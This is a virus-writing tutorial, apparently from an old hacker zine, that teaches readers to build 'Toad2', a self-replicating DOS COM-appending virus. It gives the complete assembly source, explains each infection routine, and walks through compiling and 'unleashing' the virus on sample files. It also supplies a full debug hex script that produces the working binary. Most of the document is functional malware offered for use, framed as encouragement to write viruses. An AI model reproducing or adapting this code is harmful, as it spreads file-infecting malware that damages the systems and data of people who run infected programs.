Lesson 2 The COM Appending Virus By Horny Toad In the first lesson, we discussed how to write the most basic form of virus, the overwriting virus. This type of virus has serious deficiencies which, I hope, should be very obvious to you. Nonetheless, the basic overwriting virus is a necessary stepping stone in the overall virus writing curriculum. The next virus that we will be looking at is the COM appending infector. This virus is a step up in that it infects the host program without destroying it. As the complexity of the virii increase, so do the concepts that pertain to them. With the overwriting virus, we weren't very concerned with the host program, the one that we were infecting, quite simply, because it was going to be destroyed. With the appending virus, our ultimate goal is not to harm the host program, but to slightly modify it to hold the virus code and then be able to run itself. Therefore, with the appender, you really need to visualize what is happening with your virus code and the effects on the host program. Memory usage and management are going to start playing a bigger part in your virus writing. And you can't relax after learning this virus, with EXE infectors, resident and boot virii, memory will continue to haunt you. Then, once you have a grasp on memory management, I will through some windows programming your way and utterly confuse you. At this stage, just be happy with the virus that is in this tutorial. You have accomplished a great success when you can not only produce appending virii, but really understand what is going on. Don't listen to the people that criticize the shit out of overwriting and com appenders. Understanding the basic concepts in virus programming will help to build a solid foundation in your coding skills and make the more difficult resident virii easier to grasp. I have decided to continue with the format that I used in the first lesson to describe this virus. Therefore, when you are coding in the future and need a quick explanation of a certain technique, you only need to glance at the individual sections of this tutorial. Also, I do expect that you have gone through the first tutorial on overwriting infectors. In keeping with the Codebreaker's idea of easy-to-understand articles, I will continue to describe all of the basic assembly code, even if it was already touched upon in the first lesson. I must add that the code in this article is unoptimized for the purpose of instruction. I specifically divided the code up into many different routines so that I could comment on each of them and what they do in the virus itself. I also will add that I code TASM-friendly assembly. I only use Borland's Turbo Assembler. I suggest that you use it. It is very easy to understand and the majority of virii out there are written with TASM in mind. If you still want to use MASM or some other assembler, fine, just make sure that you know the format that your code has to be in. After I published the last tutorial, I received a few complaints that people didn't fully understand the use of registers and memory addressing. It was not my goal to completely explain the use of certain complex concepts in the first tutorial. You did not need to know complex memory management to write an overwriter. In this tutorial, I will not be going over hooking interrupts, extended registers, or in-depth flag usage. Such techniques are not needed to understand a COM appender. In the next tutorial, I will be discussing EXE appenders and, in the fourth tutorial, resident virii. Be patient. Wait to understand the more difficult concepts once you need them. Otherwise, you will only get confused. Well, on with the virus. I will go ahead and give you a copy below of the basic COM appender, so that, throughout the tutorial, you can reference back to the basic skeleton code. During the explanation of the individual parts of code, I will offer different techniques to accomplish the same results as you see in the basic code. code segment assume cs:code,ds:code org 100h start: db 0e9h,0,0 toad: call bounce bounce: pop bp sub bp,OFFSET bounce first_three: mov cx,3 lea si,[bp+OFFSET thrbyte] mov di,100h push di rep movsb move_dta: lea dx,[bp+OFFSET hide_dta] mov ah,1ah int 21h get_one: mov ah,4eh lea dx,[bp+comsig] mov cx,7 next: int 21h jnc openit jmp bug_out Openit: mov ax,3d02h lea dx,[bp+OFFSET hide_dta+1eh] int 21h xchg ax,bx rec_thr: mov ah,3fh lea dx,[bp+thrbyte] mov cx,3 int 21h infect_chk: mov ax,word ptr [bp+hide_dta+1ah] mov cx,word ptr [bp+thrbyte+1] add cx,horny_toad-toad+3 cmp ax,cx jz close_up jmp_size: sub ax,3 mov word ptr [bp+newjump+1],ax to_begin: mov ax,4200h xor cx,cx xor dx,dx int 21h write_jump: mov ah,40h mov cx,3 lea dx,[bp+newjump] int 21h to_end: mov ax,4202h xor cx,cx xor dx,dx int 21h write_body: mov ah,40h mov cx,horny_toad-toad lea dx,[bp+toad] int 21h close_up: mov ah,3eh int 21h next_bug: mov ah,4fh jmp next bug_out: mov dx,80h mov ah,1ah int 21h retn comsig db '*.com',0 thrbyte db 0cdh,20h,0 newjump db 0e9h,0,0 horny_toad label near hide_dta db 42 dup (?) code ENDS END start Well, that is the basic code that we will be using for the virus. Now, before we get into discussing what the individual lines of code do, let's try to conceptualize what a COM appending virus is. Take a look below at the steps that a COM appending virus takes when executed. Outline of the COM Appending Virus 1. Determine the Delta Offset 2. Restore the infected file's original 3 bytes 3. Set a new DTA address 4. Find a COM file. 5. If none then go to step 16. 6. Open the file. 7. Read and store the first 3 bytes of the file. 8. Check if file has been previously infected. 9. Calculate the size of the jump to main virus body. 10. Move to the beginning of the file. 11. Write the jump to the main virus body. 12. Move to the end of the file. 13. Append the virus main body to the end of the file. 14. Close the file. 15. Find next matching file. Back to step 4. 16. Return the DTA to 80 hex and restore control to host program. I swore that I would never include cheesy graphics in my tutorials, but I guess I should, in order to give you a picture of what the virus and the host program look like before and after infection. Toad2 Virus Innocent Program 163 bytes 200 bytes ----------- ----------- = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = ----------- ----------- After Infection 0ffset 100h --------------- =Jump to Virus= =Main Body = - 3 bytes long =-------------= = = The delta offset is the calculation = Innocent = of the amount of space that the virus = Program = main body has moved down past the Innocent = Main Body = program main body. = = = = =-------------= = = = Virus Main = = Body = = = = = = = =Data Section = =of Virus = =--Original---= =--3 bytes of-= =--Innocent---= =--Program----= =-------------= Hopefully, I haven't completely discouraged and confused you. Once the individual sections of code are explained, all of these steps will make sense. Something that you must remember when looking at the virus code is that the virus is currently in its first generation. It hasn't yet infected a file. When you are trying to figure out how the virus code works, you will have to think of it in terms of the first time it runs as well as when the infected program is running. Well, lets have a look at the code. _____________________________________________________________________ code segment The segment directive defines the parameters for a segment. In this instance we are defining the code segment. All of the executable code, the meat of our program will lie inside of the code segment. This segment does not necessarily have to be named "code" segment, but it is only logical, and a good programming convention, to name it the "code" segment. If we were dealing with a larger program, one that had many procedures of external calls, we would definitely want to define a specific segment as our data segment separate from the code. Since this is a very small piece of code, the two will be intermixed. _____________________________________________________________________ assume cs:code,ds:code The assume directive lies within the code segment and matches the name that you gave your segment, such as code, with associated register. In our program, we are stating that the code and data segment registers will be associated with the "code" segment. What does this mean? Basically we are still setting up the parameters of our COM file. We are following convention by defining where things are in our program and how they are set up. What are the CS and DS registers? The code segment register is going to contain the starting address of your programs code segment. . Essentially, it tells your computer where to begin to look for your executable code. The DS register contains the starting address for the data section. Another register that I might as well bring up is the IP or instruction pointer register. The job of the IP is to contain the offset address of the next line of code that is to be executed. What is an offset address? An offset address is not a true address of a line in your program, rather a value of the distance away from a given point. If you put two concepts together, the code segment register added to the instruction point register will give you the next executable line in your program. The CS will stay constant as the IP counts up the lines of code. _____________________________________________________________________ org 100h You should remember this from the overwriting virus. This directive is telling the computer that our virus is a COM file located at 100 hex or 256 bytes. This 100 hex distance is actually an offset directly after the PSP or program segment prefix. The value 100h is placed in the IP, telling the computer where to begin. PSP contains information about your program and is created in memory when the program is loaded _____________________________________________________________________ start: db 0e9h,0,0 The first instruction that needs to be coded is the jump to our virus code. In the initial execution of our virus, we only want control to the next line of code, so we define a blank jump. The DB or "define byte" directive is most commonly used in the data section of our virus to define strings of information. In this instance, we are literally defining an assembly instruction manually. The instruction that we are defining is "jump." At the lowest level, the level at which the computer processes code, the instruction "jmp" has been transformed by the compiler to it's binary form "11101001." In coding assembly, the preferred numerical system is hexadecimal, so we convert the binary to e9h. No way am I getting into describing how to manually convert bin-dec-hex. I prefer to let my little old Casio do the conversions for me. Get back on track Toad. Do you think that the jump instruction stays null once the virus has infected a program? If you answered "No", then congratulations. Once the virus has infected a program, the first instruction in the code of the infected host will be a jump to the main virus body. Each time the virus infects a program, the first 3 bytes, including the jump instruction will be rewritten with a calculation to jump over the host program to the virus main body. As we progress through the virus, this will all become clearer. _____________________________________________________________________ toad: call bounce bounce: pop bp sub bp,OFFSET bounce The Delta Offset. This is probably the most singular important concept that you will have to learn when coding an appending virus. When you compile the virus for the first time, the assembler calculates the value of all of the offsets. Once the virus has appended itself to the end of the host program, the offsets that the assembler calculated are now all incorrect. The offsets do not take into account the amount of space the code has moved forward, beyond the host program. Before we go into the calculation of the delta offset, lets look at the new instructions within this routine. The first is the "call" instruction. If you remember the old BASIC computer language, call is like GOSUB. A call instruction pushes the IP onto the stack. Ok, let's take a look at that last sentence. What does it mean? Who's pushing who? And what the hell is a stack? Don't panic, we are going to take this nice and easy. The stack is a temporary memory location that can be used to store such things as the IP (the address of the next instruction) during a "call". The term "push" means that the data is being moved onto the stack. The opposite of "push" is "pop". The pop instruction merely transfers the data that was just pushed onto the stack to a specified destination. Don't freak out on me with this. At this point, this is all I want you to know about the stack, a temporary memory location. On to the calculation. The call instruction pushes the IP, the address of the next instruction on to the stack. We then pop this address into the bp. Then subtract the original offset of bounce, which was determined at the virus' original compilation, from the value in bp. The <B>ase <P>ointer is a 16 bit register used for holding certain parameters, in this case, our delta offset. All offset addresses in the main virus body will need to have bp added on to them. During the first generation of the virus, the delta offset, or the bp, will be zero. _____________________________________________________________________ first_three: mov cx,3 lea si,[bp+OFFSET thrbyte] mov di,100h push di rep movsb The first_three routine writes the host program's original three bytes back to it's original location (in memory) at location 100 hex, the beginning of the program. The instructions to do this are fairly simple and should look somewhat familiar. What do the brackets with the <L>oad <E>ffective <A>ddress instruction mean? The brackets are index specifiers. This is telling the processor to use the combined contents of the brackets as a single offset address. This is also the first time that the delta offset in the <B>ase <P>ointer register is being used. Now to the next odd looking thing, "rep movsb." Rep stands for the "repeat" instruction. CX is loaded with the amount of times that the instruction will repeat. In this case the "movsb", or moves bytes, instruction will be repeated three times. The <S>ource <I>ndex is loaded with the address of the bytes that we want to move and the <D>estination <I>ndex is loaded with the address of where we want the bytes to be moved. We are going to use the "push" instruction again to push the di location (100 hex) on to the stack to be used later in the virus (see bug_out). This routine could also be written as: first_three: lea si,[bp+OFFSET thrbyte] mov di,100h push di movsw movsb The difference is that we are no longer repeating the single byte moves. Instead, we still move 3 bytes by using the "movsw", or moves word, and movsb. So what the hell is a word in relation to a byte? Bytes ---------------------------- Word 2 Doubleword 4 Quadword 8 Paragraph 16 Page 256 _____________________________________________________________________ move_dta: lea dx,[bp+OFFSET hide_dta] mov ah,1ah int 21h Moving 1a hex into AH and doing an int 21 will set the DTA, disk transfer area, address to a specified location in DX. In this case, we want to put the DTA of the file being infected at the end of our virus at offset hide_dta. The DTA will remain and can be accessed at hide_dta + bp. At the end of the infection process, we will move the DTA back to it's original location at 80 hex. So what is actually in the <D>isk <T>ransfer <A>rea and why are we moving it? The DTA ------------------------------------------------------------ Offset Size Function 0h 21 Bytes Reserved 15h 1 Byte File Attributes 16h 2 Bytes(WORD) File Time 18h 2 Bytes(WORD) File Date 1Ah 4 Bytes(DWORD) File Size 1Eh 13 Bytes File name string The DTA is located within the <P>rogram <S>egment <P>refix. See Appendix 2 for the complete format of the PSP. When a program is executed, the program loader builds a PSP starting at address 00 hex. The PSP is 256 bytes (100 hex) long and contains information for executing the program. The DTA is located at offset 80 hex of the PSP. As you can see in the above chart, the DTA contains very useful information that we need to reference in our virus. It is good practice, especially when altering information in the DTA, to set a new DTA in a temporary location. Therefore, the host program DTA is not being changed or corrupted during the infection process. _____________________________________________________________________ get_one: mov ah,4eh lea dx,[bp+comsig] mov cx,7 next: int 21h jnc openit jmp bug_out You should remember this from the overwriting virus. A very useful piece of code that finds the first file in the current directory with the attributes that are specified in CX and DX. We load DX, in this case, with "*.com" that is defined in comsig in the data area of our virus. CX is loaded with 7 which looks for a file with any attributes. The jump instruction "jnc" tests the carry flag. Remember the carry flag from the overwriting virus? If a file is found, the carry flag is set to zero and the jump is made to openit. Otherwise, the jump is made to bug_out. _____________________________________________________________________ openit: mov ax,3d02h lea dx,[bp+OFFSET hide_dta+1eh] int 21h xchg bx,ax The openit routine takes the file that was just found and opens it for read and write with int 21 AX=3d02 hex. You will also have to load DX with the address of the filename string. Remember that the filename is stored in the DTA, bp+hide_dta, at offset 1e hex. Once the file is opened, the file handle is put in AX. For all subsequent uses of the file, we need to move the handle to BX. This is done with the xchg instruction. If you remember from the last tutorial, "mov bx,ax" can also be used, but it is one byte longer than using the xchg instruction. _____________________________________________________________________ rec_thr: mov ah,3fh lea dx,[bp+thrbyte] mov cx,3 int 21h This routine reads a record, or a certain number of bytes into a specified location. AH is loaded with 3f hex to specify the read record function. DX is loaded with the address of the input area, or the location that we want the bytes to be stored. In this case, the bytes are to be stored in thrbyte + bp, which is located in the data area of our virus. CX is loaded with the number of bytes that we are going to read. The purpose of this function in our virus is to store the first three bytes of the program to be infected to a specified place within our virus. Part of the infection process will be to write a jump, located in the first three bytes of the infected program, to our main body virus code that is located at the end of the infected program. _____________________________________________________________________ infect_chk: mov ax,word ptr [bp+hide_dta+1ah] mov cx,word ptr [bp+thrbyte+1] add cx,horny_toad-toad+3 cmp ax,cx jz close_up The infect_chk routine checks to see if the file that the virus just opened has already been infected. Don't worry, it looks a lot more difficult than it actually is. First of all we move the file size into AX. The file size is located at offset 1a hex in the DTA. Remember that our DTA is stored at bp + hide_dta. Next, we move the second and third bytes from bp + thrbyte into CX. If the file had already been infected, then the amount of the jump to our main virus body would now be in CX. Now if we add the length of the virus plus the three initial bytes and compare the amount to the filesize in AX, if the two are equal, the file is already infected and the we jump to the close_up routine. If the two amounts are different then control simply passes to the next instruction at the beginning of the jump_size routine. _____________________________________________________________________ jmp_size: sub ax,3 mov word ptr [bp+newjump+1],ax In the last routine, infect_chk, the file size was loaded into AX. We will now subract, "sub", 3 (bytes) from the file size in AX to account for the 3 byte jump written to the beginning of the file. Therefore, AX now holds the distance of the jump that must be made to get to our main virus body. In order to store this jump in new jump, we must use the index specifiers (brackets) to add the bp (delta offset) plus the offset of newjump plus 1 (to account for the jump over the e9 hex). _____________________________________________________________________ to_begin: mov ax,4200h xor cx,cx xor dx,dx int 21h In order to write the jump to our virus code, we need to move the file pointer to the beginning of the host program. As you can see, after loading 42 hex into AH, we need to zero out CX and DX. For this task we use our handy dandy XOR instruction. Remember that if we XOR a register with itself, the register is cleared to zero. You will also see the above routine written in many virii as: to_begin: mov ax,4200h cwd xor cx,cx int 21h I hesitate to show you this, but you should know what it means if you see it. The "cwd" instruction, or <C>onvert <W>ord to <D>oubleword, extends the value in AX through DX from a WORD to a Doubleword, thus zeroing out DX. _____________________________________________________________________ write_jump: mov ah,40h mov cx,3 lea dx,[bp+newjump] int 21h This routine writes the jump instruction that was stored in new_jump + bp to the beginning of the host program. The length of the jump is 3 bytes, as indicated with the amount loaded into CX. _____________________________________________________________________ to_end: mov ax,4202h xor cx,cx xor dx,dx int 21h This is essentially the same thing as the to_begin routine except that it moves the file pointer to the end of the host program so that we can write the main body of our virus. The only difference with to_end and to_begin is the 02 hex loaded in AL. _____________________________________________________________________ write_body: mov ah,40h mov cx,horny_toad-toad lea dx,[bp+toad] int 21h This routine is practically a ditto of the write_jump routine. With this one, we are writing the main body of the virus to the end of the host file. CX is loaded with the length of the virus not including the initial jump. Remember that CX is just a measurement, the entire virus is not being moved into the CX register. DX, as usual, contains the starting address from which to write. _____________________________________________________________________ close_up: mov ah,3eh int 21h Setting 3e hex into AH and initiating an int 21 closes the current file. This operation updates the directory and FAT, file allocation table with the date and file size. _____________________________________________________________________ next_bug: mov ah,4fh jmp next This instruction should look familiar from the overwriting virus. Moving 4f hex into AH sets up the find next file routine. What this does is take the attributes that we loaded when the 4e hex routine was initiated in get_one and find the next file that contains those attributes. You will notice that the int 21 is done after the jump is made to next. _____________________________________________________________________ bug_out: mov dx,80h mov ah,1ah int 21h retn The bug_out routine replaces the DTA address to 80 hex and transfers control over to the host program. In the case of the first generation virus being run, an int 20, or terminate program, is issued in the first three bytes to terminate operations. The "retn" instruction is the means that we use to return control to the host program. The return instruction moves the word at the top of the stack into the IP. Remember in the first_three routine when we pushed the di (100 hex) onto the stack? We were actually setting up the return sequence to hand control back to the original program. If you hadn't pushed di (100 hex) on to the stack at the beginning of the virus, you could now replace the retn with: mov di,100h jmp di or push 100h ret Basically anything that will transfer control to offset 100 hex, the beginning of the host program in memory. _____________________________________________________________________ comsig db '*.com',0 thrbyte db 0cdh,20h,0 newjump db 0e9h,0,0 horny_toad label near hide_dta db 43 dup (?) Now we get to the data area of our virus. For convenience and organization we will define all the necessary data here at the end of the virus. Since we have not actually declared this area to be a data section, the information defined here could very well be located at the beginning of the virus. Now let's look at the information that we are defining. This should all look familiar because the virus has already utilized all of this data during the execution of the above code. The first thing that we define is thrbyte. Thrbyte holds the first three bytes of the infected program, which are replaced with the jump to the virus main body. Only on the first run of the virus will this be cd hex - 20 hex, or int 20h, terminate program. These are the three bytes that will be written in memory to location 100 hex. On completion of the infection process, control of the host program will be returned and the instructions at 100 hex will be executed. On the first run of the virus, we simply want the virus to terminate after it has infected all of the COM files that it has found. Otherwise, we would have a vicious loop of the virus continuing to search for more files. The next piece of data that we will define is newjump. Initially newjump will hold only a blank jmp instruction (e9 hex). Newjump is calculated in jmp_size and actually written to the newly infected file in the write_jump routine. The next line is simply a marker, horny_toad. Remember that we used the same near label in the overwriting virus just as a place to reference the end point of the operational virus. This line has no other purpose in the virus. The last thing that is defined in the virus is the hide_dta. This is the area that we will use to store the DTA during our virus operation. The DTA is 43 (2B hex) bytes long. Therefore we use the duplicate instruction to set up the amount of area for the DTA. _____________________________________________________________________ code ends end start The next two lines essentially close up the virus code. "Code ends" defines the end of the code segment. If I had defined a data segment, I would have ended it with "data ends." The end directive marks the end of the virus. Start indicates to the computer where to start execution of the code, which should be somewhere in the code segment. Sorry for the brevity of the description of the final lines, but they really are simple, they are completing, or closing up the beginning lines of our virus code. _____________________________________________________________________ Compiling and Unleashing the Toad2 Virus Well, congratulations, you have finished the second lesson in virus writing. Now you know how to write a more advanced virus than the overwriting infector. The next step for you to do is compile this virus and watch it infect some files. The program that you will be using to compile the source code is TASM. TASM is a very awesome compiler. Please, do not use MASM. The linker program that you will be using is TLINK, which turns the compiler's output into an executable program. It really doesn't matter which editor that you use to type the asm file with. You can actually use any word processor that you want. When it comes time to compiling the virus, switch to dos and follow the instructions below. I would like for you to type the virus out yourself, but I have included a zipped directory, create, that contains the coded asm file. In order to compile the virus, save the virus as an ".asm" file. With TASM in the same directory, type: C:\>tasm toad2.asm (You can actually do this from any directory that you want) The result should be: Turbo Assembler Version 2.01 Assembling file: toad2.asm Error Messages: none Warning Messages: none Passes: 1 Remaining Memory: 425k If there was an error in the code, TASM will indicate it in the error messages line. If you have typed the code in yourself and there is an error, revert back to the file "toad2.asm" and take a look at my code, it works. If there are too many problems with your code and you'd just like to see how all this stuff works, switch to the "create" directory and type the above instructions again. There is a copy of the "toad2.asm" and TASM and TLINK in this directory. What TASM has done is convert the ASM file into an OBJ file. In order to get an executable COM file, we need to use the linker. Type: C:\>tlink /t toad2.obj Tlink will return TOAD2.COM in the current directory. You now have a virus in front of you. Don't get scared, it won't bite. Now you will need to move the virus from the current directory to the pond directory. Type: C:\>copy toad2.com c:\pond\ Then type : C:\>cd ..\pond This will move you to the pond directory. Now list the contents of the directory by typing: C:\pond>dir You will see that there are some files in this directory, TOAD2.COM and FLY(1-3).COM. TOAD.COM is your virus and the FLY(1-3).COM are the files that you are going to infect. FLY.COM is just a simple COM file that does absolutely nothing. Easy prey! Take a note of the size of the two files, 6 and 162. Now unleash the virus by typing: C:\pond>toad2 Now list the contents of the directory again. You will now see that the files FLY(1-3) have become a little larger. FLY(1-3).COM are now infected. If all your attempts to compile and link the toad2 virus fail, I have included a compiled copy of the toad2 virus and many fly.com files in the TOAD directory. Change to the TOAD directory and type toad2. The fly files will become infected. _____________________________________________________________________ Debug script of the Toad2 virus For those of you who would rather not use the compiler for some ungodly reason or if you are interested in viewing a hex dump of the virus in first generation, here is the debug script of toad2.com. Looking at the debug script of your virus can also help you out in determining the length of certain parts of the virus. Take a look at the script below. You can see the blank jump "e9 00 00" at the beginning of the code for the jump to the main virus body. Look at the end of the script and you can find the int 20 "cd 20" and the blank jump in newjump "e9 00 00". To measure the distance of certain parts of the virus, each two digit group equals one byte. For example, "e9" equals one byte. You can determine the total length of the virus by counting the number of groups in the script. In this case, the toad2 virus will come out to 163 bytes. I hope that I have not confused you with this. I purposely put this section at the end of the tutorial because I did not want to go into detail on the use of debug. In the next edition of the zine there will be an article on using debug in virus writing. I just wanted to give you a taste of what is to come. In order to get a functioning virus from the below code you need to find your copy of debug. Cut the below code out and save it to a file called toad2.txt. Then at a cursor, with debug in the same directory, type: debug < toad2.txt N TOAD2.COM E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 B9 03 00 8D B6 E 0110 9D 01 BF 00 01 57 F3 A4 8D 96 A3 01 B4 1A CD 21 E 0120 B4 4E 8D 96 97 01 B9 07 00 CD 21 73 03 EB 60 90 E 0130 B8 02 3D 8D 96 C1 01 CD 21 93 B4 3F 8D 96 9D 01 E 0140 B9 03 00 CD 21 3E 8B 86 BD 01 3E 8B 8E 9E 01 81 E 0150 C1 A3 00 3B C1 74 30 2D 03 00 3E 89 86 A1 01 B8 E 0160 00 42 33 C9 33 D2 CD 21 B4 40 B9 03 00 8D 96 A0 E 0170 01 CD 21 B8 02 42 33 C9 33 D2 CD 21 B4 40 B9 A0 E 0180 00 8D 96 03 01 CD 21 B4 3E CD 21 B4 4F EB 9A BA E 0190 80 00 B4 1A CD 21 C3 2A 2E 63 6F 6D 00 CD 20 00 E 01A0 E9 00 00 RCX 00A3 W Q _____________________________________________________________________ Appendix 1 - The Registers AX Accumulator BX Base register CX Counting register DX Data register DS Data Segment register ES Extra Segment register SS Stack Segment register CS Code Segment register BP Base Pointer register SI Source Index register DI Destination Index register SP Stack Pointer register IP Next Instruction Pointer register F Flag register Appendix 2 - The PSP (from Ralf Brown's Interrupt List) Format of Program Segment Prefix (PSP): Offset Size Description (Table 1032) 00h 2 BYTEs INT 20 instruction for CP/M CALL 0 program termination the CDh 20h here is often used as a signature for a valid PSP 02h WORD segment of first byte beyond memory allocated to program 04h BYTE (DOS) unused filler (OS/2) count of fake DOS version returns 05h BYTE CP/M CALL 5 service request (FAR CALL to absolute 000C0h) BUG: (DOS 2+ DEBUG) PSPs created by DEBUG point at 000BEh 06h WORD CP/M compatibility--size of first segment for .COM files 08h 2 BYTEs remainder of FAR JMP at 05h 0Ah DWORD stored INT 22 termination address 0Eh DWORD stored INT 23 control-Break handler address 12h DWORD DOS 1.1+ stored INT 24 critical error handler address 16h WORD segment of parent PSP 18h 20 BYTEs DOS 2+ Job File Table, one byte per file handle, FFh = closed 2Ch WORD DOS 2+ segment of environment for process (see #1033) 2Eh DWORD DOS 2+ process's SS:SP on entry to last INT 21 call 32h WORD DOS 3+ number of entries in JFT (default 20) 34h DWORD DOS 3+ pointer to JFT (default PSP:0018h) 38h DWORD DOS 3+ pointer to previous PSP (default FFFFFFFFh in 3.x) used by SHARE in DOS 3.3 3Ch BYTE DOS 4+ (DBCS) interim console flag (see AX=6301h) Novell DOS 7 DBCS interim flag as set with AX=6301h (possibly also used by Far East MS-DOS 3.2-3.3) 3Dh BYTE (APPEND) TrueName flag (see INT 2F/AX=B711h) 3Eh BYTE (Novell NetWare) flag: next byte initialized if CEh (OS/2) capabilities flag 3Fh BYTE (Novell NetWare) Novell task number if previous byte is CEh 40h 2 BYTEs DOS 5+ version to return on INT 21/AH=30h 42h WORD (MSWindows3) selector of next PSP (PDB) in linked list Windows keeps a linked list of Windows programs only 44h WORD (MSWindows3) "PDB_Partition" 46h WORD (MSWindows3) "PDB_NextPDB" 48h BYTE (MSWindows3) bit 0 set if non-Windows application (WINOLDAP) 49h BYTE unused by DOS versions <= 6.00 4Ch WORD (MSWindows3) "PDB_EntryStack" 4Eh 2 BYTEs unused by DOS versions <= 6.00 50h 3 BYTEs DOS 2+ service request (INT 21/RETF instructions) 53h 2 BYTEs unused in DOS versions <= 6.00 55h 7 BYTEs unused in DOS versions <= 6.00; can be used to make first FCB into an extended FCB 5Ch 16 BYTEs first default FCB, filled in from first commandline argument overwrites second FCB if opened 6Ch 16 BYTEs second default FCB, filled in from second commandline argument overwrites beginning of commandline if opened 7Ch 4 BYTEs unused 80h 128 BYTEs commandline / default DTA command tail is BYTE for length of tail, N BYTEs for the tail, followed by a BYTE containing 0Dh